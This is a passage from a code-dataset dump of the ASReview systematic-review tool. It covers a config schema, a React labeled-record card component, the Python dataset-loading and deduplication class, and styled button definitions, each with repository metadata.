[PROJECT_MODE_ORACLE, PROJECT_MODE_EXPLORE, PROJECT_MODE_SIMULATE]\n\n# CLI defaults\nDEFAULT_MODEL = \"nb\"\nDEFAULT_QUERY_STRATEGY = \"max\"\nDEFAULT_BALANCE_STRATEGY = \"double\"\nDEFAULT_FEATURE_EXTRACTION = \"tfidf\"\nDEFAULT_N_INSTANCES = 1\nDEFAULT_N_PRIOR_INCLUDED = 1\nDEFAULT_N_PRIOR_EXCLUDED = 1\n\nLEGACY_STATE_EXTENSIONS = [\".h5\", \".hdf5\", \".he5\", \".json\"]\n\nCOLUMN_DEFINITIONS = {\n # included\n \"included\": [\n \"final_included\",\n \"label\",\n \"label_included\",\n \"included_label\",\n \"included_final\",\n \"included\",\n \"included_flag\",\n \"include\",\n ],\n # abstract included (pending deprecation)\n \"abstract_included\": [\n \"abstract_included\",\n \"included_abstract\",\n \"included_after_abstract\",\n \"label_abstract_screening\",\n ],\n \"title\": [\"title\", \"primary_title\"],\n \"authors\": [\"authors\", \"author names\", \"first_authors\"],\n \"abstract\": [\"abstract\", \"abstract note\", \"notes_abstract\"],\n \"notes\": [\"notes\"],\n \"keywords\": [\"keywords\"],\n \"doi\": [\"doi\"],\n}\n\n# the schema describes the content of the ASReview project file.\nSCHEMA = {\n \"$schema\": \"http://json-schema.org/draft-07/schema\",\n \"$id\": \"http://example.com/example.json\",\n \"type\": \"object\",\n \"title\": \"The ASReview project file root schema\",\n \"description\": \"The root schema comprises the entire project.json file in the ASReview project file.\",\n \"default\": {},\n \"examples\": [\n {\n \"version\": \"1.0\",\n \"id\": \"example\",\n \"mode\": \"oracle\",\n \"name\": \"example\",\n \"description\": \"\",\n \"authors\": \"\",\n \"created_at_unix\": 1648205610,\n \"datetimeCreated\": \"2022-03-25 11:53:30.510461\",\n \"reviews\": [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n \"end_time\": \"2022-03-26 10:31:52.441360\",\n }\n ],\n \"feature_matrices\": [\n {\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}\n ],\n \"dataset_path\": \"example.ris\",\n }\n ],\n \"required\": [\"version\", \"id\", \"mode\", \"name\"],\n \"properties\": {\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"title\": \"The version schema\",\n \"description\": \"The version of ASReview on initiation of the project.\",\n \"default\": \"\",\n \"examples\": [\"1.0\"],\n },\n \"id\": {\n \"$id\": \"#/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id schema\",\n \"description\": \"The unique identifier of the project.\",\n \"default\": \"\",\n \"examples\": [\"example\"],\n },\n \"mode\": {\n \"$id\": \"#/properties/mode\",\n \"type\": \"string\",\n \"title\": \"The mode schema\",\n \"description\": \"The mode of the project. One of oracle, explore, or simulate.\",\n \"default\": \"\",\n \"enum\": PROJECT_MODES,\n \"examples\": [\"oracle\"],\n },\n \"name\": {\n \"$id\": \"#/properties/name\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The name schema\",\n \"description\": \"The name of the project.\",\n \"default\": \"\",\n \"examples\": [\"example\"],\n },\n \"description\": {\n \"$id\": \"#/properties/description\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The description schema\",\n \"description\": \"The description of the project.\",\n \"default\": \"\",\n \"examples\": [\"\"],\n },\n \"authors\": {\n \"$id\": \"#/properties/authors\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The authors schema\",\n \"description\": \"The authors of the project.\",\n \"default\": \"\",\n \"examples\": [\"\"],\n },\n \"created_at_unix\": {\n \"$id\": \"#/properties/created_at_unix\",\n \"type\": [\"integer\", \"null\"],\n \"title\": \"The created_at_unix schema\",\n \"description\": \"An explanation about the purpose of this instance.\",\n \"default\": 0,\n \"examples\": [1648205610],\n },\n \"datetimeCreated\": {\n \"$id\": \"#/properties/datetimeCreated\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The datetimeCreated schema\",\n \"description\": \"The date and time of the project creation.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-25 11:53:30.510461\"],\n },\n \"reviews\": {\n \"$id\": \"#/properties/reviews\",\n \"type\": \"array\",\n \"title\": \"The reviews schema\",\n \"description\": \"The list of reviews in the project. Multiple reviews per project are possible, however this is limited to 1 at the moment.\",\n \"default\": [],\n \"examples\": [\n [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n }\n ]\n ],\n \"additionalItems\": True,\n \"items\": {\n \"$id\": \"#/properties/reviews/items\",\n \"anyOf\": [\n {\n \"$id\": \"#/properties/reviews/items/anyOf/0\",\n \"type\": \"object\",\n \"title\": \"The first anyOf schema\",\n \"description\": \"An explanation about the purpose of this instance.\",\n \"default\": {},\n \"examples\": [\n {\n \"id\": \"4793de70a8d44eb4baa68bac2853c91a\",\n \"start_time\": \"2022-03-25 11:55:50.551360\",\n \"status\": \"review\",\n }\n ],\n \"required\": [\"id\", \"start_time\", \"status\"],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id of the review.\",\n \"description\": \"A unique UUID4 identifier of the review.\",\n \"default\": \"\",\n \"examples\": [\"4793de70a8d44eb4baa68bac2853c91a\"],\n },\n \"start_time\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/start_time\",\n \"type\": \"string\",\n \"title\": \"The start_time of the review.\",\n \"description\": \"The start date and time of the review.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-25 11:55:50.551360\"],\n },\n \"end_time\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/start_time\",\n \"type\": \"string\",\n \"title\": \"The end_time of the review.\",\n \"description\": \"The end date and time of the review.\",\n \"default\": \"\",\n \"examples\": [\"2022-03-26 10:31:52.441360\"],\n },\n \"status\": {\n \"$id\": \"#/properties/reviews/items/anyOf/0/properties/status\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The status of the review.\",\n \"description\": \"The status of the review. Options are setup, review, finished.\",\n \"enum\": [\"setup\", \"review\", \"finished\"],\n \"default\": \"setup\",\n \"examples\": [\"review\"],\n },\n },\n \"additionalProperties\": True,\n }\n ],\n },\n },\n \"feature_matrices\": {\n \"$id\": \"#/properties/feature_matrices\",\n \"type\": \"array\",\n \"title\": \"The feature_matrices schema\",\n \"description\": \"Information about the feature matrices.\",\n \"default\": [],\n \"examples\": [[{\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}]],\n \"additionalItems\": True,\n \"items\": {\n \"$id\": \"#/properties/feature_matrices/items\",\n \"anyOf\": [\n {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0\",\n \"type\": \"object\",\n \"title\": \"The first anyOf schema\",\n \"description\": \"Information about a feature matrix.\",\n \"default\": {},\n \"examples\": [\n {\"id\": \"tfidf\", \"filename\": \"tfidf_feature_matrix.npz\"}\n ],\n \"required\": [\"id\", \"filename\"],\n \"properties\": {\n \"id\": {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0/properties/id\",\n \"type\": \"string\",\n \"title\": \"The id schema\",\n \"description\": \"A unique id of the feature matrix.\",\n \"default\": \"\",\n \"examples\": [\"tfidf\"],\n },\n \"filename\": {\n \"$id\": \"#/properties/feature_matrices/items/anyOf/0/properties/filename\",\n \"type\": \"string\",\n \"title\": \"The filename schema\",\n \"description\": \"The name of the file with the feature matrix. Usually a sparse matrix.\",\n \"default\": \"\",\n \"examples\": [\"tfidf_feature_matrix.npz\"],\n },\n },\n \"additionalProperties\": True,\n }\n ],\n },\n },\n \"dataset_path\": {\n \"$id\": \"#/properties/dataset_path\",\n \"type\": [\"string\", \"null\"],\n \"title\": \"The dataset_path schema\",\n \"description\": \"Name of the dataset file.\",\n \"default\": \"\",\n \"examples\": [\"example.ris\"],\n },\n },\n \"additionalProperties\": True,\n}\n" }, { "alpha_fraction": 0.3844626843929291, "alphanum_fraction": 0.38653793931007385, "avg_line_length": 31.501466751098633, "blob_id": "db42b6437785e2d74d5cd57666c809e451b37859", "content_id": "c5c82394cdb17aa37a38ee2dccb0cc4a977ccfa8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 11083, "license_type": "permissive", "max_line_length": 79, "num_lines": 341, "path": "/asreview/webapp/src/ProjectComponents/HistoryComponents/LabeledRecordCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useParams } from \"react-router-dom\";\nimport TruncateMarkup from \"react-truncate-markup\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n IconButton,\n Link,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\n\nimport {\n LabelOff,\n Link as LinkIcon,\n Favorite,\n FavoriteBorder,\n} from \"@mui/icons-material\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { RecordCardNote } from \"../HistoryComponents\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\nimport { ProjectAPI } from \"../../api/index.js\";\nimport { mapStateToProps, projectModes } from \"../../globals.js\";\nimport { DOIIcon } from \"../../icons\";\n\nconst PREFIX = \"LabeledRecordCard\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n cardActions: `${PREFIX}-card-actions`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.root}`]: {\n borderRadius: 16,\n },\n\n [`& .${classes.cardActions}`]: {\n justifyContent: \"space-between\",\n },\n}));\n\nconst LabeledRecordCard = (props) => {\n const { project_id } = useParams();\n const queryClient = useQueryClient();\n\n const [recordReadMore, setRecordReadMore] = React.useState(null);\n const [note, setNote] = React.useState({\n data: null,\n editing: null,\n });\n\n const returnProjectId = () => {\n return !project_id ? props.project_id : project_id;\n };\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n ProjectAPI.mutateClassification,\n {\n mutationKey: \"mutateLabeledPriorKnowledge\",\n onSuccess: (data, variables) => {\n // update cached data\n queryClient.setQueryData(\n [\n \"fetchLabeledRecord\",\n {\n project_id: returnProjectId(),\n subset: props.returnSubset(),\n },\n ],\n (prev) => {\n return {\n ...prev,\n pages: prev.pages.map((page) => {\n return {\n ...page,\n result: page.result.map((value) => {\n return {\n ...value,\n included:\n value.id !== variables.doc_id\n ? value.included\n : variables.label,\n note:\n value.id !== variables.doc_id\n ? value.note\n : !variables.note\n ? null\n : variables.note,\n };\n }),\n };\n }),\n };\n },\n );\n if (variables.doc_id === recordReadMore) {\n setRecordReadMore(null);\n }\n if (variables.doc_id === note.editing) {\n setNote({\n data: null,\n editing: null,\n });\n }\n if (props.is_prior) {\n queryClient.invalidateQueries(\"fetchLabeledStats\");\n }\n },\n },\n );\n\n const handleClickLabelConvert = (value) => {\n mutate({\n project_id: returnProjectId(),\n doc_id: value.id,\n label: value.included === 1 ? 0 : 1,\n note: !value.note ? \"\" : value.note,\n initial: false,\n is_prior: !props.is_prior ? 0 : 1,\n });\n };\n\n const handleClickRemoveLabel = (value) => {\n mutate({\n project_id: returnProjectId(),\n doc_id: value.id,\n label: -1,\n note: !value.note ? \"\" : value.note,\n initial: false,\n is_prior: 1,\n });\n };\n\n const handleClickAddNote = (doc_id) => {\n setNote((s) => {\n return {\n ...s,\n editing: doc_id,\n };\n });\n };\n\n const disableAddNoteButton = (doc_id) => {\n return doc_id !== note.editing && note.editing !== null;\n };\n\n // only on history page\n const disableConvertPrior = (prior) => {\n return !props.is_prior && prior === 1;\n };\n\n const isSimulationProject = () => {\n return props.mode === projectModes.SIMULATION;\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n {isError && (\n <Box sx={{ pt: 8, pb: 16 }}>\n <InlineErrorHandler\n message={error[\"message\"]}\n refetch={reset}\n button={true}\n />\n </Box>\n )}\n {!isError &&\n props.page.result\n .filter((value) => value.included !== -1)\n .map((value) => (\n <Card elevation={3} className={classes.root} key={value.id}>\n <CardContent className=\"record-card-content\">\n <Stack spacing={1}>\n <Typography variant=\"h6\">\n {value.title ? value.title : \"No title available\"}\n </Typography>\n {!props.is_prior && (value.doi || value.url) && (\n <Stack direction=\"row\" spacing={1}>\n {/* Show DOI if available */}\n {value.doi && (\n <StyledIconButton\n className=\"record-card-icon\"\n href={\"https://doi.org/\" + value.doi}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <DOIIcon />\n </StyledIconButton>\n )}\n\n {/* Show URL if available */}\n {value.url && (\n <Tooltip title=\"Open URL\">\n <StyledIconButton\n className=\"record-card-icon\"\n href={value.url}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <LinkIcon />\n </StyledIconButton>\n </Tooltip>\n )}\n </Stack>\n )}\n <TruncateMarkup\n lines={value.id === recordReadMore ? Infinity : 6}\n ellipsis={\n <span>\n ...{\" \"}\n <Link\n component=\"button\"\n underline=\"none\"\n onClick={() => setRecordReadMore(value.id)}\n >\n read more\n </Link>\n </span>\n }\n >\n <Typography color=\"textSecondary\">\n {value.abstract\n ? value.abstract\n : \"No abstract available\"}\n </Typography>\n </TruncateMarkup>\n </Stack>\n </CardContent>\n <CardActions className={classes.cardActions}>\n <Tooltip\n title={\n !isSimulationProject()\n ? disableConvertPrior(value.prior)\n ? \"Prior knowledge cannot be converted\"\n : note.editing !== value.id\n ? value.included === 1\n ? \"Convert to irrelevant\"\n : \"Convert to relevant\"\n : \"Save note before converting\"\n : \"Cannot be converted in simulation mode\"\n }\n >\n <span>\n <IconButton\n disabled={\n isSimulationProject() ||\n disableConvertPrior(value.prior) ||\n isLoading ||\n note.editing === value.id\n }\n onClick={() => {\n handleClickLabelConvert(value);\n }}\n >\n {value.included === 1 ? (\n <Favorite\n color=\"error\"\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n ) : (\n <FavoriteBorder\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n )}\n </IconButton>\n </span>\n </Tooltip>\n {props.is_prior && (\n <Tooltip\n title={`Remove ${\n value.included !== 1 ? \"irrelevant\" : \"relevant\"\n } label`}\n >\n <span>\n <IconButton\n disabled={isLoading}\n onClick={() => {\n handleClickRemoveLabel(value);\n }}\n >\n <LabelOff\n fontSize={!props.mobileScreen ? \"medium\" : \"small\"}\n />\n </IconButton>\n </span>\n </Tooltip>\n )}\n {!props.is_prior &&\n !value.note &&\n value.id !== note.editing && (\n <Tooltip\n title={\n !props.isSimulating\n ? !disableAddNoteButton(value.id)\n ? \"\"\n : \"Save another note before adding\"\n : \"Add note after simulation is finished\"\n }\n >\n <span>\n <Button\n disabled={\n props.isSimulating ||\n disableAddNoteButton(value.id)\n }\n onClick={() => handleClickAddNote(value.id)}\n size={!props.mobileScreen ? \"medium\" : \"small\"}\n >\n Add note\n </Button>\n </span>\n </Tooltip>\n )}\n </CardActions>\n <RecordCardNote\n isLoading={isLoading}\n record={value}\n mobileScreen={props.mobileScreen}\n mutate={mutate}\n note={note}\n setNote={setNote}\n is_prior={props.is_prior}\n />\n </Card>\n ))}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps)(LabeledRecordCard);\n" }, { "alpha_fraction": 0.578102707862854, "alphanum_fraction": 0.5802730321884155, "avg_line_length": 29.934629440307617, "blob_id": "f4ca8eeda2165965dd210010a148d9d075bf87fa", "content_id": "df7aba84543a33bdfd0cab83e5339040ebc44295", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17509, "license_type": "permissive", "max_line_length": 87, "num_lines": 566, "path": "/asreview/data/base.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport hashlib\nfrom io import StringIO\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import is_object_dtype\nfrom pandas.api.types import is_string_dtype\n\nfrom asreview.config import COLUMN_DEFINITIONS\nfrom asreview.config import LABEL_NA\nfrom asreview.datasets import DatasetManager\nfrom asreview.datasets import DatasetNotFoundError\nfrom asreview.exceptions import BadFileFormatError\nfrom asreview.io import PaperRecord\nfrom asreview.io.utils import convert_keywords\nfrom asreview.io.utils import type_from_column\nfrom asreview.utils import _entry_points\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import is_iterable\nfrom asreview.utils import is_url\n\n\ndef load_data(name, *args, **kwargs):\n \"\"\"Load data from file, URL, or plugin.\n\n Parameters\n ----------\n name: str, pathlib.Path\n File path, URL, or alias of extension dataset.\n\n Returns\n -------\n asreview.ASReviewData:\n Inititalized ASReview data object.\n \"\"\"\n\n # check is file or URL\n if is_url(name) or Path(name).exists():\n return ASReviewData.from_file(name, *args, **kwargs)\n\n # check if dataset is plugin dataset\n try:\n return ASReviewData.from_extension(name, *args, **kwargs)\n except DatasetNotFoundError:\n pass\n\n # Could not find dataset, return None.\n raise FileNotFoundError(f\"File, URL, or dataset does not exist: '{name}'\")\n\n\nclass ASReviewData:\n \"\"\"Data object to the dataset with texts, labels, DOIs etc.\n\n Arguments\n ---------\n df: pandas.DataFrame\n Dataframe containing the data for the ASReview data object.\n column_spec: dict\n Specification for which column corresponds to which standard\n specification. Key is the standard specification, key is which column\n it is actually in. Default: None.\n\n Attributes\n ----------\n record_ids: numpy.ndarray\n Return an array representing the data in the Index.\n texts: numpy.ndarray\n Returns an array with either headings, bodies, or both.\n headings: numpy.ndarray\n Returns an array with dataset headings.\n title: numpy.ndarray\n Identical to headings.\n bodies: numpy.ndarray\n Returns an array with dataset bodies.\n abstract: numpy.ndarray\n Identical to bodies.\n notes: numpy.ndarray\n Returns an array with dataset notes.\n keywords: numpy.ndarray\n Returns an array with dataset keywords.\n authors: numpy.ndarray\n Returns an array with dataset authors.\n doi: numpy.ndarray\n Returns an array with dataset DOI.\n included: numpy.ndarray\n Returns an array with document inclusion markers.\n final_included: numpy.ndarray\n Pending deprecation! Returns an array with document inclusion markers.\n labels: numpy.ndarray\n Identical to included.\n\n \"\"\"\n\n def __init__(self, df=None, column_spec=None):\n self.df = df\n self.prior_idx = np.array([], dtype=int)\n self.max_idx = max(df.index.values) + 1\n\n # Infer column specifications if it is not given.\n if column_spec is None:\n self.column_spec = {}\n for col_name in list(df):\n data_type = type_from_column(col_name, COLUMN_DEFINITIONS)\n if data_type is not None:\n self.column_spec[data_type] = col_name\n else:\n self.column_spec = column_spec\n\n if \"included\" not in self.column_spec:\n self.column_spec[\"included\"] = \"included\"\n\n def __len__(self):\n if self.df is None:\n return 0\n return len(self.df.index)\n\n def hash(self):\n \"\"\"Compute a hash from the dataset.\n\n Returns\n -------\n str:\n SHA1 hash, computed from the titles/abstracts of the dataframe.\n \"\"\"\n if (\n len(self.df.index) < 1000 and self.bodies is not None\n ) or self.texts is None:\n texts = \" \".join(self.bodies)\n else:\n texts = \" \".join(self.texts)\n return hashlib.sha1(\n \" \".join(texts).encode(encoding=\"UTF-8\", errors=\"ignore\")\n ).hexdigest()\n\n @classmethod\n def from_file(cls, fp, reader=None):\n \"\"\"Create instance from supported file format.\n\n It works in two ways; either manual control where the conversion\n functions are supplied or automatic, where it searches in the entry\n points for the right conversion functions.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n Read the data from this file or url.\n reader: class\n Reader to import the file.\n \"\"\"\n\n if reader is not None:\n return cls(reader.read_data(fp))\n\n # get the filename from a url else file path\n if is_url(fp):\n fn = _get_filename_from_url(fp)\n else:\n fn = Path(fp).name\n\n try:\n reader = _entry_points(\n group=\"asreview.readers\")[Path(fn).suffix].load()\n except Exception:\n raise BadFileFormatError(f\"Importing file {fp} not possible.\")\n\n df, column_spec = reader.read_data(fp)\n\n return cls(df, column_spec=column_spec)\n\n @classmethod\n def from_extension(cls, name, reader=None):\n \"\"\"Load a dataset from extension.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n Read the data from this file or url.\n reader: class\n Reader to import the file.\n \"\"\"\n\n dataset = DatasetManager().find(name)\n\n if dataset.filepath:\n fp = dataset.filepath\n else:\n # build dataset to temporary file\n reader = dataset.reader()\n fp = StringIO(dataset.to_file())\n\n if reader is None:\n # get the filename from a url else file path\n if is_url(fp):\n fn = _get_filename_from_url(fp)\n else:\n fn = Path(fp).name\n\n try:\n reader = _entry_points(\n group=\"asreview.readers\")[Path(fn).suffix].load()\n except Exception:\n raise BadFileFormatError(f\"Importing file {fp} not possible.\")\n\n df, column_spec = reader.read_data(fp)\n\n return cls(df, column_spec=column_spec)\n\n def record(self, i, by_index=True):\n \"\"\"Create a record from an index.\n\n Arguments\n ---------\n i: int, iterable\n Index of the record, or list of indices.\n by_index: bool\n If True, take the i-th value as used internally by the review.\n If False, take the record with record_id==i.\n\n Returns\n -------\n PaperRecord\n The corresponding record if i was an integer, or a list of records\n if i was an iterable.\n \"\"\"\n if not is_iterable(i):\n index_list = [i]\n else:\n index_list = i\n\n if by_index:\n records = [\n PaperRecord(\n **self.df.iloc[j],\n column_spec=self.column_spec,\n record_id=self.df.index.values[j],\n )\n for j in index_list\n ]\n else:\n records = [\n PaperRecord(\n **self.df.loc[j, :], record_id=j, column_spec=self.column_spec\n )\n for j in index_list\n ]\n\n if is_iterable(i):\n return records\n return records[0]\n\n @property\n def record_ids(self):\n return self.df.index.values\n\n @property\n def texts(self):\n if self.title is None:\n return self.abstract\n if self.abstract is None:\n return self.title\n\n cur_texts = np.array(\n [self.title[i] + \" \" + self.abstract[i] for i in range(len(self))],\n dtype=object,\n )\n return cur_texts\n\n @property\n def headings(self):\n return self.title\n\n @property\n def title(self):\n try:\n return self.df[self.column_spec[\"title\"]].values\n except KeyError:\n return None\n\n @property\n def bodies(self):\n return self.abstract\n\n @property\n def abstract(self):\n try:\n return self.df[self.column_spec[\"abstract\"]].values\n except KeyError:\n return None\n\n @property\n def notes(self):\n try:\n return self.df[self.column_spec[\"notes\"]].values\n except KeyError:\n return None\n\n @property\n def keywords(self):\n try:\n return self.df[self.column_spec[\"keywords\"]].apply(convert_keywords).values\n except KeyError:\n return None\n\n @property\n def authors(self):\n try:\n return self.df[self.column_spec[\"authors\"]].values\n except KeyError:\n return None\n\n @property\n def doi(self):\n try:\n return self.df[self.column_spec[\"doi\"]].values\n except KeyError:\n return None\n\n @property\n def url(self):\n try:\n return self.df[self.column_spec[\"url\"]].values\n except KeyError:\n return None\n\n def get(self, name):\n \"Get column with name.\"\n try:\n return self.df[self.column_spec[name]].values\n except KeyError:\n return self.df[name].values\n\n @property\n def prior_data_idx(self):\n \"Get prior_included, prior_excluded from dataset.\"\n convert_array = np.full(self.max_idx, 999999999)\n convert_array[self.df.index.values] = np.arange(len(self.df.index))\n return convert_array[self.prior_idx]\n\n @property\n def included(self):\n return self.labels\n\n @included.setter\n def included(self, labels):\n self.labels = labels\n\n @property # pending deprecation\n def final_included(self):\n return self.labels\n\n @final_included.setter # pending deprecation\n def final_included(self, labels):\n self.labels = labels\n\n @property\n def labels(self):\n try:\n column = self.column_spec[\"included\"]\n return self.df[column].values\n except KeyError:\n return None\n\n @labels.setter\n def labels(self, labels):\n try:\n column = self.column_spec[\"included\"]\n self.df[column] = labels\n except KeyError:\n self.df[\"included\"] = labels\n\n def prior_labels(self, state, by_index=True):\n \"\"\"Get the labels that are marked as 'prior'.\n\n state: BaseState\n Open state that contains the label information.\n by_index: bool\n If True, return internal indexing.\n If False, return record_ids for indexing.\n\n Returns\n -------\n numpy.ndarray\n Array of indices that have the 'prior' property.\n \"\"\"\n prior_indices = state.get_priors()[\"record_id\"].to_list()\n\n if by_index:\n return np.array(prior_indices, dtype=int)\n else:\n return self.df.index.values[prior_indices]\n\n def to_file(self, fp, labels=None, ranking=None, writer=None):\n \"\"\"Export data object to file.\n\n RIS, CSV, TSV and Excel are supported file formats at the moment.\n\n Arguments\n ---------\n fp: str\n Filepath to export to.\n labels: list, numpy.ndarray\n Labels to be inserted into the dataframe before export.\n ranking: list, numpy.ndarray\n Optionally, dataframe rows can be reordered.\n writer: class\n Writer to export the file.\n \"\"\"\n df = self.to_dataframe(labels=labels, ranking=ranking)\n\n if writer is not None:\n writer.write_data(df, fp, labels=labels, ranking=ranking)\n else:\n best_suffix = None\n\n for entry in _entry_points(group=\"asreview.writers\"):\n if Path(fp).suffix == entry.name:\n if best_suffix is None or len(entry.name) > len(best_suffix):\n best_suffix = entry.name\n\n if best_suffix is None:\n raise BadFileFormatError(\n f\"Error exporting file {fp}, no capabilities \"\n \"for exporting such a file.\"\n )\n\n writer = _entry_points(group=\"asreview.writers\")[best_suffix].load()\n writer.write_data(df, fp, labels=labels, ranking=ranking)\n\n def to_dataframe(self, labels=None, ranking=None):\n \"\"\"Create new dataframe with updated label (order).\n\n Arguments\n ---------\n labels: list, numpy.ndarray\n Current labels will be overwritten by these labels\n (including unlabelled). No effect if labels is None.\n ranking: list\n Reorder the dataframe according to these record_ids.\n Default ordering if ranking is None.\n\n Returns\n -------\n pandas.DataFrame\n Dataframe of all available record data.\n \"\"\"\n result_df = pd.DataFrame.copy(self.df)\n col_label = self.column_spec[\"included\"]\n\n # if there are labels, add them to the frame\n if labels is not None:\n # unnest the nested (record_id, label) tuples\n labeled_record_ids = [x[0] for x in labels]\n labeled_values = [x[1] for x in labels]\n\n # remove the old results and write the values\n result_df[col_label] = LABEL_NA\n result_df.loc[labeled_record_ids, col_label] = labeled_values\n\n # if there is a ranking, apply this ranking as order\n if ranking is not None:\n # sort the datasets based on the ranking\n result_df = result_df.loc[ranking]\n # append a column with 1 to n\n result_df[\"asreview_ranking\"] = np.arange(1, len(result_df) + 1)\n\n # replace labeled NA values by np.nan\n if col_label in list(result_df):\n result_df[col_label] = result_df[col_label].astype(object)\n result_df.loc[result_df[col_label] == LABEL_NA, col_label] = np.nan\n\n return result_df\n\n def duplicated(self, pid=\"doi\"):\n \"\"\"Return boolean Series denoting duplicate rows.\n\n Identify duplicates based on titles and abstracts and if available,\n on a persistent identifier (PID) such as the Digital Object Identifier\n (`DOI <https://www.doi.org/>`_).\n\n Arguments\n ---------\n pid: string\n Which persistent identifier to use for deduplication.\n Default is 'doi'.\n\n Returns\n -------\n pandas.Series\n Boolean series for each duplicated rows.\n \"\"\"\n if pid in self.df.columns:\n # in case of strings, strip whitespaces and replace empty strings with None\n if is_string_dtype(self.df[pid]) or is_object_dtype(self.df[pid]):\n s_pid = self.df[pid].str.strip().replace(\"\", None)\n else:\n s_pid = self.df[pid]\n\n # save boolean series for duplicates based on persistent identifiers\n s_dups_pid = (s_pid.duplicated()) & (s_pid.notnull())\n else:\n s_dups_pid = None\n\n # get the texts, clean them and replace empty strings with None\n s = (\n pd.Series(self.texts)\n .str.replace(\"[^A-Za-z0-9]\", \"\", regex=True)\n .str.lower()\n .str.strip()\n .replace(\"\", None)\n )\n\n # save boolean series for duplicates based on titles/abstracts\n s_dups_text = (s.duplicated()) & (s.notnull())\n\n # final boolean series for all duplicates\n if s_dups_pid is not None:\n s_dups = s_dups_pid | s_dups_text\n else:\n s_dups = s_dups_text\n\n return s_dups\n\n def drop_duplicates(self, pid=\"doi\", inplace=False, reset_index=True):\n \"\"\"Drop duplicate records.\n\n Drop duplicates based on titles and abstracts and if available,\n on a persistent identifier (PID) such the Digital Object Identifier\n (`DOI <https://www.doi.org/>`_).\n\n Arguments\n ---------\n pid: string, default 'doi'\n Which persistent identifier to use for deduplication.\n inplace: boolean, default False\n Whether to modify the DataFrame rather than creating a new one.\n reset_index: boolean, default True\n If True, the existing index column is reset to the default integer index.\n\n Returns\n -------\n pandas.DataFrame or None\n DataFrame with duplicates removed or None if inplace=True\n \"\"\"\n df = self.df[~self.duplicated(pid)]\n\n if reset_index:\n df = df.reset_index(drop=True)\n if inplace:\n self.df = df\n return\n return df\n" }, { "alpha_fraction": 0.6541666388511658, "alphanum_fraction": 0.6541666388511658, "avg_line_length": 26.69230842590332, "blob_id": "b3e3a4c94fe1766bd2ed7dc7d3612fbdbb28e055", "content_id": "fc7c0da01f150ea3b07f8ecfcfbce6179a768a5a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 720, "license_type": "permissive", "max_line_length": 74, "num_lines": 26, "path": "/asreview/webapp/src/StyledComponents/StyledButton.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import { Button, IconButton } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { LoadingButton } from \"@mui/lab\";\n\nexport const StyledTextButton = styled(Button)(({ theme }) => ({\n textTransform: \"none\",\n [`:hover`]: {\n backgroundColor: \"transparent\",\n },\n}));\n\nexport const StyledIconButton = styled(IconButton)(({ theme }) => ({\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n color: theme.palette.text.primary,\n },\n}));\n\nexport const StyledLoadingButton = styled(LoadingButton)(({ theme }) => ({\n color: theme.palette.text.secondary,\n [`:hover`]: {\n backgroundColor: \"transparent\",\n color: theme.palette.text.primary,\n },\n}));\n" }, { "alpha_fraction": 0.7134328484535217, "alphanum_fraction": 0.7223880887031555, "avg_line_length": 